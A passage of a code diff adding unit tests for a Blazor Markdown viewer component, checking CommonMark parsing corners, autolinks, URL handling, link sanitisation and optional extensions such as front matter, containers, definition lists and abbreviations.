+        Assert.IsFalse(component.Find(".bit-mdv img").HasAttribute("src"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldBlockDataUrlsInLinks()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "[x](data:image/png;base64,iVBORw0KGgo=)");
+        });
+
+        Assert.IsFalse(component.Find(".bit-mdv a").HasAttribute("href"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldRenderAriaLabelAndTabIndex()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "# x");
+            parameters.Add(p => p.AriaLabel, "Release notes");
+            parameters.Add(p => p.TabIndex, "0");
+        });
+
+        var root = component.Find(".bit-mdv");
+
+        Assert.AreEqual("Release notes", root.GetAttribute("aria-label"));
+        Assert.AreEqual("0", root.GetAttribute("tabindex"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldExposeTheParsedDocument()
+    {
+        BitMarkdownDocumentNode? parsed = null;
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "# One\n\n## Two");
+            parameters.Add(p => p.Pipeline, BitMarkdownPipelines.Advanced);
+            parameters.Add(p => p.OnParsed, (BitMarkdownDocumentNode d) => parsed = d);
+        });
+
+        Assert.IsNotNull(parsed);
+        Assert.AreSame(parsed, component.Instance.Document);
+
+        var headings = BitMarkdownAstHelper.Descendants(parsed).OfType<BitMarkdownHeadingNode>().ToList();
+
+        Assert.AreEqual(2, headings.Count);
+        Assert.AreEqual("one", headings[0].Id);
+        Assert.AreEqual("two", headings[1].Id);
+    }
+
+    // -- CommonMark core corners --------------------------------------------
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldRenderSetextHeadings()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "Title\n=====\n\nSubtitle\n--------");
+        });
+
+        var markup = component.Markup;
+
+        Assert.Contains("<h1>Title</h1>", markup);
+        Assert.Contains("<h2>Subtitle</h2>", markup);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldRenderHardBreaks()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "one  \ntwo\\\nthree");
+        });
+
+        Assert.AreEqual(2, component.FindAll(".bit-mdv br").Count);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldRenderLooseListsWithParagraphs()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "- one\n\n- two");
+        });
+
+        Assert.AreEqual(2, component.FindAll(".bit-mdv li > p").Count);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldRenderTightListsWithoutParagraphs()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "- one\n- two");
+        });
+
+        Assert.AreEqual(0, component.FindAll(".bit-mdv li > p").Count);
+        Assert.AreEqual(2, component.FindAll(".bit-mdv li").Count);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldStartANewListWhenTheMarkerChanges()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "- one\n* two");
+        });
+
+        Assert.AreEqual(2, component.FindAll(".bit-mdv ul").Count);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldKeepEscapedPunctuationLiteral()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, @"\*not emphasis\* and \[not a link\]");
+        });
+
+        var markup = component.Markup;
+
+        Assert.DoesNotContain("<em>", markup);
+        Assert.Contains("*not emphasis* and [not a link]", component.Find(".bit-mdv p").TextContent);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldKeepPipesEscapedInsideTableCells()
+    {
+        var markdown = "| a | b |\n|---|---|\n| x \\| y | z |";
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, markdown);
+            parameters.Add(p => p.Pipeline, BitMarkdownPipelines.GitHub);
+        });
+
+        var cells = component.FindAll(".bit-mdv tbody td");
+
+        Assert.AreEqual(2, cells.Count);
+        Assert.AreEqual("x | y", cells[0].TextContent);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldTrimTrailingPunctuationFromAutolinks()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "Go to https://bitplatform.dev, now.");
+            parameters.Add(p => p.Pipeline, BitMarkdownPipelines.GitHub);
+        });
+
+        Assert.AreEqual("https://bitplatform.dev", component.Find(".bit-mdv a").GetAttribute("href"));
+    }
+
+    [TestMethod]
+    [DataRow("https://en.wikipedia.org/wiki/Foo_bar_baz")]
+    [DataRow("https://example.com/a_(b)")]
+    [DataRow("https://example.com/a~b")]
+    [DataRow("https://example.com/_a_b")]
+    public void BitMarkdownViewerShouldAutolinkUrlsContainingDelimiterCharacters(string url)
+    {
+        // The scanner emits a token per delimiter run, so an unpaired '_' / '*' / '~' inside
+        // a bare URL would otherwise reach the autolink processor as several text nodes and
+        // only the first fragment would be linked.
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, $"Go to {url} now.");
+            parameters.Add(p => p.Pipeline, BitMarkdownPipelines.GitHub);
+        });
+
+        Assert.AreEqual(url, component.Find(".bit-mdv a").GetAttribute("href"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldEncodeSpacesInUrls()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "[a](</my url>) and ![b](</my image.png>)");
+        });
+
+        Assert.AreEqual("/my%20url", component.Find(".bit-mdv a").GetAttribute("href"));
+        Assert.AreEqual("/my%20image.png", component.Find(".bit-mdv img").GetAttribute("src"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldNotDoubleEncodeUrls()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "[a](/already%20encoded)");
+        });
+
+        Assert.AreEqual("/already%20encoded", component.Find(".bit-mdv a").GetAttribute("href"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldNotAutolinkInsideCode()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "`https://bitplatform.dev`");
+            parameters.Add(p => p.Pipeline, BitMarkdownPipelines.GitHub);
+        });
+
+        Assert.AreEqual(0, component.FindAll(".bit-mdv a").Count);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldMarkExternalLinksAsSafeToOpen()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "[out](https://example.com)");
+        });
+
+        var link = component.Find(".bit-mdv a");
+
+        Assert.AreEqual("_blank", link.GetAttribute("target"));
+        Assert.AreEqual("noopener noreferrer", link.GetAttribute("rel"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldNotNestLinksInsideLinks()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "[a [b](https://b.com) c](https://a.com)");
+        });
+
+        var links = component.FindAll(".bit-mdv a");
+
+        Assert.AreEqual(1, links.Count);
+        Assert.AreEqual("https://a.com", links[0].GetAttribute("href"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldRenderCodeBlockLanguageClass()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "```csharp\nvar x = 1;\n```");
+        });
+
+        Assert.AreEqual("language-csharp", component.Find(".bit-mdv pre code").GetAttribute("class"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldRenderNestedBlockquotes()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "> outer\n>\n> > inner");
+        });
+
+        Assert.AreEqual(2, component.FindAll(".bit-mdv blockquote").Count);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldRenderAngleBracketAutolinks()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "<https://bitplatform.dev> and <a@b.com>");
+        });
+
+        var links = component.FindAll(".bit-mdv a");
+
+        Assert.AreEqual(2, links.Count);
+        Assert.AreEqual("https://bitplatform.dev", links[0].GetAttribute("href"));
+        Assert.AreEqual("mailto:a@b.com", links[1].GetAttribute("href"));
+    }
 }

--- a/src/BlazorUI/Tests/Bit.BlazorUI.Tests/Components/Extras/MarkdownViewer/BitMarkdownViewerTests.cs
+++ b/src/BlazorUI/Tests/Bit.BlazorUI.Tests/Components/Extras/MarkdownViewer/BitMarkdownViewerTests.cs
@@ -1298,4 +1298,1545 @@ public class BitMarkdownViewerTests : BunitTestContext
         Assert.AreEqual("https://bitplatform.dev", links[0].GetAttribute("href"));
         Assert.AreEqual("mailto:a@b.com", links[1].GetAttribute("href"));
     }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldRenderTheEmphasisExtras()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseEmphasisExtras().Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "H~2~O x^2^ ++new++ ==hot== ~~old~~");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        var html = component.Find(".bit-mdv").InnerHtml;
+
+        Assert.Contains("<sub>2</sub>", html);
+        Assert.Contains("<sup>2</sup>", html);
+        Assert.Contains("<ins>new</ins>", html);
+        Assert.Contains("<mark>hot</mark>", html);
+        // Subscript shares '~' with strikethrough, so enabling it must not cost the two-tilde form.
+        Assert.Contains("<del>old</del>", html);
+    }
+
+    [TestMethod]
+    [DataRow("1 + 2 = 3")]
+    [DataRow("a+b and a=b")]
+    public void BitMarkdownViewerShouldNotReadASinglePlusOrEqualsAsEmphasis(string markdown)
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseEmphasisExtras().Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, markdown);
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        var html = component.Find(".bit-mdv").InnerHtml;
+
+        Assert.DoesNotContain("<ins>", html);
+        Assert.DoesNotContain("<mark>", html);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldNotReadASingleTildeAsSubscriptWithoutTheEmphasisExtras()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "H~2~O");
+            parameters.Add(p => p.Pipeline, BitMarkdownPipelines.GitHub);
+        });
+
+        var html = component.Find(".bit-mdv").InnerHtml;
+
+        Assert.DoesNotContain("<sub>", html);
+        Assert.Contains("H~2~O", html);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldEnableStrikethroughAndTheExtrasInEitherOrder()
+    {
+        // '~' can only belong to one delimiter processor, so registering both flavors either way
+        // round has to produce one pipeline that renders both forms rather than throwing.
+        var extrasFirst = new BitMarkdownPipelineBuilder().UseEmphasisExtras().UseStrikethrough().Build();
+        var strikeFirst = new BitMarkdownPipelineBuilder().UseStrikethrough().UseEmphasisExtras().Build();
+
+        foreach (var pipeline in new[] { extrasFirst, strikeFirst })
+        {
+            var component = RenderComponent<BitMarkdownViewer>(parameters =>
+            {
+                parameters.Add(p => p.Markdown, "~~old~~ and H~2~O");
+                parameters.Add(p => p.Pipeline, pipeline);
+            });
+
+            var html = component.Find(".bit-mdv").InnerHtml;
+
+            Assert.Contains("<del>old</del>", html);
+            Assert.Contains("<sub>2</sub>", html);
+        }
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldRenderFrontMatterAsNothing()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseFrontMatter().Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "---\ntitle: Hello\n---\n\n# Body");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        var html = component.Find(".bit-mdv").InnerHtml;
+
+        Assert.DoesNotContain("<hr", html);
+        Assert.DoesNotContain("title: Hello", html);
+        Assert.Contains("<h1>Body</h1>", html);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldRenderFrontMatterAsMarkdownWithoutTheExtension()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "---\ntitle: Hello\n---\n\n# Body");
+        });
+
+        // Without the flavor the fences are ordinary Markdown, which is exactly the garbage the
+        // extension exists to prevent.
+        Assert.Contains("title: Hello", component.Find(".bit-mdv").InnerHtml);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldExposeTheParsedFrontMatter()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseFrontMatter().Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "---\ntitle: Hello\ndraft: true\n---\n\nbody");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        var frontMatter = BitMarkdownFrontMatterNode.Find(component.Instance.Document);
+
+        Assert.IsNotNull(frontMatter);
+        Assert.AreEqual("---", frontMatter.Fence);
+        Assert.IsFalse(frontMatter.IsToml);
+        Assert.AreEqual("title: Hello\ndraft: true", frontMatter.Text);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldReadTomlFrontMatter()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseFrontMatter().Build();
+
+        var document = pipeline.Parse("+++\ntitle = \"Hello\"\n+++\n\nbody");
+
+        var frontMatter = BitMarkdownFrontMatterNode.Find(document);
+
+        Assert.IsNotNull(frontMatter);
+        Assert.IsTrue(frontMatter.IsToml);
+        Assert.AreEqual("title = \"Hello\"", frontMatter.Text);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldNotTreatAnUnterminatedBlockAsFrontMatter()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseFrontMatter().Build();
+
+        var document = pipeline.Parse("---\ntitle: Hello\n\nbody");
+
+        Assert.IsNull(BitMarkdownFrontMatterNode.Find(document));
+        Assert.IsInstanceOfType<BitMarkdownThematicBreakNode>(document.Children[0]);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldOnlyTreatTheTopOfTheDocumentAsFrontMatter()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseFrontMatter().Build();
+
+        // A fence after any content - or nested inside a block quote - is an ordinary thematic
+        // break, not a metadata block.
+        Assert.IsNull(BitMarkdownFrontMatterNode.Find(pipeline.Parse("intro\n\n---\na: b\n---\n")));
+        Assert.AreEqual(0, BitMarkdownAstHelper.Descendants(pipeline.Parse("> ---\n> a: b\n> ---\n"))
+                                               .OfType<BitMarkdownFrontMatterNode>().Count());
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldStillRenderThematicBreaksWithTheFrontMatterExtension()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseFrontMatter().Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "a\n\n---\n\nb");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        Assert.AreEqual(1, component.FindAll(".bit-mdv hr").Count);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldCurlQuotesAndDashesWithSmartyPants()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseSmartyPants().Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "\"Quoted\" -- 2024---2026 ... don't <<x>>");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        var text = component.Find(".bit-mdv p").TextContent;
+
+        Assert.Contains("“Quoted”", text);
+        Assert.Contains("–", text);
+        Assert.Contains("—", text);
+        Assert.Contains("…", text);
+        Assert.Contains("don’t", text);
+        Assert.Contains("«x»", text);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldLeaveCodeAndUrlsAloneWithSmartyPants()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseSmartyPants().Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "`a -- b ...` and [x](https://e.com/a--b...c)");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        var root = component.Find(".bit-mdv");
+
+        Assert.AreEqual("a -- b ...", root.QuerySelector("code")!.TextContent);
+        Assert.AreEqual("https://e.com/a--b...c", root.QuerySelector("a")!.GetAttribute("href"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldNotCurlAnythingWithoutSmartyPants()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "\"Quoted\" -- ...");
+        });
+
+        Assert.AreEqual("\"Quoted\" -- ...", component.Find(".bit-mdv p").TextContent);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldAddHeadingPermalinksWhenAsked()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseAutoIdentifiers(anchorLinks: true).Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "## Getting started");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        var heading = component.Find(".bit-mdv h2");
+        var anchor = heading.QuerySelector("a.bit-mdv-anchor");
+
+        Assert.AreEqual("getting-started", heading.GetAttribute("id"));
+        Assert.IsNotNull(anchor);
+        Assert.AreEqual("#getting-started", anchor.GetAttribute("href"));
+        Assert.AreEqual("Permalink to Getting started", anchor.GetAttribute("aria-label"));
+        // The glyph itself is decorative; the link is named after its heading instead.
+        Assert.AreEqual("true", anchor.QuerySelector("span")!.GetAttribute("aria-hidden"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldNotAddHeadingPermalinksByDefault()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "## Getting started");
+            parameters.Add(p => p.Pipeline, BitMarkdownPipelines.Advanced);
+        });
+
+        Assert.AreEqual(0, component.FindAll(".bit-mdv .bit-mdv-anchor").Count);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldNotLetThePermalinkLeakIntoTheHeadingSlug()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseAutoIdentifiers(anchorLinks: true).Build();
+
+        var document = pipeline.Parse("# One\n\n# One\n");
+
+        var headings = BitMarkdownAstHelper.Descendants(document).OfType<BitMarkdownHeadingNode>().ToList();
+
+        Assert.AreEqual("one", headings[0].Id);
+        Assert.AreEqual("one-1", headings[1].Id);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldRenderInlineContentWithoutBlockWrappers()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "a **bold** word");
+            parameters.Add(p => p.Inline, true);
+        });
+
+        var root = component.Find(".bit-mdv");
+
+        Assert.AreEqual("SPAN", root.TagName);
+        Assert.Contains("bit-mdv-inline", root.ClassName);
+        Assert.DoesNotContain("<p>", root.InnerHtml);
+        Assert.Contains("<strong>bold</strong>", root.InnerHtml);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldStillRenderNonParagraphBlocksWhenInline()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "text\n\n- one\n- two");
+            parameters.Add(p => p.Inline, true);
+        });
+
+        var root = component.Find(".bit-mdv");
+
+        Assert.DoesNotContain("<p>", root.InnerHtml);
+        Assert.AreEqual(2, root.QuerySelectorAll("li").Length);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldRenderABlockRootByDefault()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "a word");
+        });
+
+        var root = component.Find(".bit-mdv");
+
+        Assert.AreEqual("DIV", root.TagName);
+        Assert.DoesNotContain("bit-mdv-inline", root.ClassName);
+        Assert.Contains("<p>", root.InnerHtml);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldReparseWhenInlineToggles()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "a word");
+        });
+
+        Assert.AreEqual("DIV", component.Find(".bit-mdv").TagName);
+
+        component.Render(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "a word");
+            parameters.Add(p => p.Inline, true);
+        });
+
+        Assert.AreEqual("SPAN", component.Find(".bit-mdv").TagName);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldScrollAWideTableInsideAWrapperRatherThanTheTableItself()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "| a | b |\n|---|---|\n| 1 | 2 |");
+            parameters.Add(p => p.Pipeline, BitMarkdownPipelines.GitHub);
+        });
+
+        var wrapper = component.Find(".bit-mdv .bit-mdv-table-wrapper");
+
+        // Scrolling a wrapper keeps the <table> a table for assistive technology, and the wrapper
+        // is focusable so the overflow is reachable with the keyboard alone.
+        Assert.AreEqual("region", wrapper.GetAttribute("role"));
+        Assert.AreEqual("0", wrapper.GetAttribute("tabindex"));
+        Assert.IsNotNull(wrapper.QuerySelector("table"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldMarkTaskListItemsWithTheirOwnClasses()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "- [x] done\n- [ ] todo");
+            parameters.Add(p => p.Pipeline, BitMarkdownPipelines.GitHub);
+        });
+
+        var root = component.Find(".bit-mdv");
+
+        // The classes are what let the stylesheet drop the bullets without ":has()".
+        Assert.Contains("contains-task-list", root.QuerySelector("ul")!.ClassName);
+        Assert.AreEqual(2, root.QuerySelectorAll("li.task-list-item").Length);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldNotMarkOrdinaryListItemsAsTasks()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "- one\n- two");
+            parameters.Add(p => p.Pipeline, BitMarkdownPipelines.GitHub);
+        });
+
+        var root = component.Find(".bit-mdv");
+
+        Assert.AreEqual(0, root.QuerySelectorAll("li.task-list-item").Length);
+        // A list with no task items carries no class at all, rather than an empty one.
+        Assert.IsNull(root.QuerySelector("ul")!.GetAttribute("class"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerAdvancedPipelineShouldCarryFrontMatterAndTheEmphasisExtras()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "---\ntitle: t\n---\n\nH~2~O and ==hot==");
+            parameters.Add(p => p.Pipeline, BitMarkdownPipelines.Advanced);
+        });
+
+        var html = component.Find(".bit-mdv").InnerHtml;
+
+        Assert.DoesNotContain("title: t", html);
+        Assert.Contains("<sub>2</sub>", html);
+        Assert.Contains("<mark>hot</mark>", html);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldRenderCustomContainers()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseContainers().Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, ":::warning Read this\nBe **careful**\n:::");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        var container = component.Find(".bit-mdv .markdown-container");
+
+        Assert.Contains("markdown-container-warning", container.ClassName);
+        Assert.AreEqual("Read this", container.QuerySelector(".markdown-container-title")!.TextContent);
+        Assert.IsNotNull(container.QuerySelector("strong"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldNestCustomContainers()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseContainers().Build();
+
+        var document = pipeline.Parse(":::note\nouter\n\n:::tip\ninner\n:::\n\nstill outer\n:::");
+
+        var outer = document.Children.Single() as BitMarkdownContainerNode;
+
+        Assert.IsNotNull(outer);
+        Assert.AreEqual("note", outer.Name);
+        // The inner fence is balanced against its own closer, so it does not end the outer one.
+        Assert.AreEqual(1, outer.Children.OfType<BitMarkdownContainerNode>().Count());
+        Assert.AreEqual(2, outer.Children.OfType<BitMarkdownParagraphNode>().Count());
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldNotRenderContainersWithoutTheExtension()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, ":::warning\nx\n:::");
+            parameters.Add(p => p.Pipeline, BitMarkdownPipelines.GitHub);
+        });
+
+        Assert.AreEqual(0, component.FindAll(".bit-mdv .markdown-container").Count);
+        Assert.Contains(":::warning", component.Find(".bit-mdv").TextContent);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldRenderDefinitionLists()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseDefinitionLists().Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "Blazor\n: A framework.\n: Ships in .NET.\n\nC#\n: A language.");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        var list = component.Find(".bit-mdv dl");
+
+        Assert.AreEqual(2, list.QuerySelectorAll("dt").Length);
+        Assert.AreEqual(3, list.QuerySelectorAll("dd").Length);
+        Assert.AreEqual("Blazor", list.QuerySelectorAll("dt")[0].TextContent);
+        Assert.AreEqual("A framework.", list.QuerySelectorAll("dd")[0].TextContent);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldLetADefinitionHoldSeveralBlocks()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseDefinitionLists().Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "Term\n: First.\n\n    Second.\n\nAfter");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        var root = component.Find(".bit-mdv");
+
+        Assert.AreEqual(2, root.QuerySelector("dd")!.QuerySelectorAll("p").Length);
+        // The trailing paragraph is outside the list, not swallowed by the last definition.
+        Assert.AreEqual("After", root.QuerySelectorAll("p")[^1].TextContent);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldNotTurnOrdinaryProseIntoADefinitionList()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseDefinitionLists().Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "a: b\n\nplain text");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        Assert.AreEqual(0, component.FindAll(".bit-mdv dl").Count);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldNotReadAContainerFenceAsADefinitionMarker()
+    {
+        // ':::' has no whitespace after its first colon, so it can never open a definition -
+        // which is what lets both flavors run in one pipeline.
+        var pipeline = new BitMarkdownPipelineBuilder().UseContainers().UseDefinitionLists().Build();
+
+        var document = pipeline.Parse(":::note\nx\n:::\n\nTerm\n: def");
+
+        Assert.AreEqual(1, document.Children.OfType<BitMarkdownContainerNode>().Count());
+        Assert.AreEqual(1, document.Children.OfType<BitMarkdownDefinitionListNode>().Count());
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldExpandAbbreviations()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseAbbreviations().Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "*[HTML]: HyperText Markup Language\n\nThe HTML spec.");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        var root = component.Find(".bit-mdv");
+        var abbreviation = root.QuerySelector("abbr");
+
+        Assert.IsNotNull(abbreviation);
+        Assert.AreEqual("HTML", abbreviation.TextContent);
+        Assert.AreEqual("HyperText Markup Language", abbreviation.GetAttribute("title"));
+        // The definition line declares the term; it is not part of the document.
+        Assert.DoesNotContain("*[HTML]", root.TextContent);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldOnlyExpandWholeWordAbbreviations()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseAbbreviations().Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "*[HTML]: HyperText Markup Language\n\nHTMLElement and `HTML` and HTML.");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        var root = component.Find(".bit-mdv");
+
+        // Only the standalone occurrence is expanded: not the prefix of a longer identifier, and
+        // not the one inside code.
+        Assert.AreEqual(1, root.QuerySelectorAll("abbr").Length);
+        Assert.AreEqual("HTML", root.QuerySelector("code")!.TextContent);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldPreferTheLongestAbbreviation()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseAbbreviations().Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "*[HTML]: Markup\n*[HTML5]: The fifth one\n\nHTML5 came after HTML.");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        var abbreviations = component.Find(".bit-mdv").QuerySelectorAll("abbr");
+
+        Assert.AreEqual(2, abbreviations.Length);
